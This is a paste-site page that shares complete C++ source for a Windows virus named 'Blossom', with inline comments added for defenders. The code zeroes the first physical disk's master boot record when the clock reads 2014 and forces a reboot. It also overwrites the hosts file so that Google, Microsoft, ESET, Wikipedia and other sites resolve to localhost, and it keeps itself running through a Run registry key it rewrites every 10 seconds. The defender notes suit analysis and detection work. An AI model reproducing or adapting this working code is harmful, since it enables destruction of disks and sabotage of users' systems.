FlyFar

Blossom - C++ Virus Source Code

Jan 22nd, 2023
C++ 2.87 KB | Cybersecurity | 0 0
  1. #include <Windows.h>
  2.  
  // CheckTime: date-triggered destructive payload. WinMain starts it on a new
  // thread every 10 seconds. When the local clock's year is 2014 it writes 512
  // zero bytes through a handle to \\.\PhysicalDrive0, shows a message box and
  // requests a reboot. It returns 0 in every case.
  //
  // Defender notes: none of the API return values are checked, so the message
  // box and the reboot request still run when the disk could not be opened.
  // The behaviour to alert on is a process that is not a disk utility opening
  // \\.\PhysicalDrive0 with write access. That open normally needs an elevated
  // administrator token, so running users without admin rights limits impact.
  3. DWORD WINAPI CheckTime(){
  4. DWORD write;
  5. SYSTEMTIME st;
  6. char data[512];
  7. ZeroMemory(&data,sizeof(data)); // the payload is simply 512 zero bytes
  8. GetLocalTime(&st); // local time, so the trigger follows the machine's own clock setting
  9. if(st.wYear==2014){ // trigger: the year field alone; month and day are not examined
  10. HANDLE disk=CreateFile("\\\\.\\PhysicalDrive0",GENERIC_ALL,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,0,NULL); // raw handle to the first physical disk
  11. WriteFile(disk,data,512,&write,NULL); // written at the handle's initial position, i.e. the first 512 bytes of the disk (the MBR on MBR-partitioned disks)
  12. CloseHandle(disk);
  13. MessageBox(0,"Time to die now!","You have been hacked!",MB_ICONWARNING); // blocks this thread until dismissed; the strings are usable as static indicators
  14. ExitWindowsEx(EWX_REBOOT,0); // relies on the shutdown privilege that WinMain enables
  15. }
  16. return 0;
  17. }
  18.  
  // hosts: replaces the Windows hosts file. It builds the path
  // %windir%\system32\drivers\etc\hosts, recreates the file with CREATE_ALWAYS
  // (any previous content is discarded) and writes the bytes in data[].
  // WinMain runs it once, on its own thread. It returns 0 in every case.
  //
  // data[] is plain ASCII given as hex. Decoded, it is eight CRLF-separated
  // lines, each a hostname followed by " 127.0.0.1" (no CRLF after the last):
  //   www.youtube.com    www.google.com   www.yahoo.com   www.facebook.com
  //   www.microsoft.com  www.eset.com     www.eset.eu     en.wikipedia.org
  // The list includes a security vendor's and the OS vendor's sites.
  //
  // Defender notes: monitor the hosts file for writes and for content changes
  // (file integrity monitoring); a hosts file holding exactly these eight
  // lines is an indicator of this sample. Writing under %windir%\system32
  // normally requires administrator rights. Remediation is to restore the
  // hosts file from a known-good copy after the process has been removed.
  19. DWORD WINAPI hosts(){
  20. char data[]={0x77,0x77,0x77,0x2E,0x79,0x6F,0x75,0x74,0x75,0x62,0x65,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x67,0x6F,0x6F,0x67,0x6C,0x65,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x79,0x61,0x68,0x6F,0x6F,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x66,0x61,0x63,0x65,0x62,0x6F,0x6F,0x6B,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x6D,0x69,0x63,0x72,0x6F,0x73,0x6F,0x66,0x74,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x65,0x73,0x65,0x74,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x65,0x73,0x65,0x74,0x2E,0x65,0x75,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x65,0x6E,0x2E,0x77,0x69,0x6B,0x69,0x70,0x65,0x64,0x69,0x61,0x2E,0x6F,0x72,0x67,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31};
  21. char path[60];
  22. DWORD write;
  23. GetEnvironmentVariable("windir",path,sizeof(path)); // the Windows directory is taken from the process environment
  24. strcat(path,"\\system32\\drivers\\etc\\hosts");
  25. HANDLE hFile=CreateFile(path,GENERIC_ALL,0,NULL,CREATE_ALWAYS,0,NULL); // CREATE_ALWAYS truncates an existing hosts file; share mode 0 is exclusive while open
  26. WriteFile(hFile,data,sizeof(data),&write,NULL); // sizeof(data) is the exact byte count of the array; no terminator is written
  27. CloseHandle(hFile);
  28. return 0;
  29. }
  30.  
  // reg: persistence thread. In an endless loop it opens or creates
  // HKLM\Software\Microsoft\Windows\CurrentVersion\Run, sets the value "Hana"
  // to "hana.exe", closes the key and sleeps 10 seconds. The return statement
  // after the loop is never reached.
  //
  // Defender notes: the value is rewritten every 10 seconds, so deleting it
  // while the process is alive does not stick. Terminate the process first,
  // then remove the Run value and the copied file. One process writing the
  // same Run-key value at a fixed interval is a strong detection signal, and
  // writing under HKLM normally requires administrator rights.
  31. DWORD WINAPI reg(){
  32. char value[]="hana.exe"; // bare file name, no directory component
  33. HKEY hKey;
  34. while(1){
  35. RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&hKey);
  36. RegSetValueEx(hKey,"Hana",0,REG_SZ,(LPBYTE)value,60); // cbData is 60 although value[] holds 9 bytes, so the stored data runs past the string terminator (forensic artifact: a 60-byte REG_SZ)
  37. RegCloseKey(hKey);
  38. Sleep(10000); // 10-second re-assertion interval
  39. }
  40. return 0;
  41. }
  42.  
  // WinMain: entry point. In order, it
  //   1. enables the shutdown privilege (SE_SHUTDOWN_NAME) on its own token,
  //      which the reboot request in CheckTime depends on;
  //   2. copies its own executable to %windir%\hana.exe, overwriting any
  //      existing file of that name (bFailIfExists is false);
  //   3. starts the reg (Run-key persistence) and hosts (hosts-file
  //      replacement) threads;
  //   4. loops forever, starting a new CheckTime thread every 10 seconds.
  // No API return value is checked and the final return is never reached.
  //
  // Indicators visible in this listing, for triage: the file
  // %windir%\hana.exe; the value "Hana" under
  // HKLM\Software\Microsoft\Windows\CurrentVersion\Run; a replaced hosts file;
  // a message box titled "You have been hacked!". The token handle and every
  // thread handle are never closed, so the process's handle count grows by at
  // least one every 10 seconds, which is observable in process monitoring.
  43. int WinMain(HINSTANCE hInst,HINSTANCE hPrev,LPSTR cmd,int show){
  44. char file[MAX_PATH];
  45. char path[60];
  46. HANDLE hToken;
  47. LUID luid;
  48. LookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME,&luid); // NULL system name means the local machine
  49. TOKEN_PRIVILEGES tp;
  50. tp.Privileges[0].Luid=luid;
  51. tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
  52. tp.PrivilegeCount=1;
  53. OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hToken);
  54. AdjustTokenPrivileges(hToken,false,&tp,sizeof(tp),NULL,NULL); // enables the privilege on this process's own token
  55. GetModuleFileName(NULL,file,sizeof(file)); // full path of the running executable
  56. GetEnvironmentVariable("windir",path,60);
  57. strcat(path,"\\hana.exe");
  58. CopyFile(file,path,false); // self-copy into the Windows directory; normally needs administrator rights
  59. CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)reg,NULL,0,NULL);
  60. CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)hosts,NULL,0,NULL);
  61. while(1){
  62. CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)CheckTime,NULL,0,NULL); // the date check is re-run on a fresh thread each cycle
  63. Sleep(10000);
  64. }
  65. return 0;
  66. }
Comments
  • FlyFar
    1 year
    # text 0.10 KB | 0 0
    1. Whenever the system clock's year is 2014, the virus overwrites the MBR of the hard disk with zeros, leaving the computer unable to boot.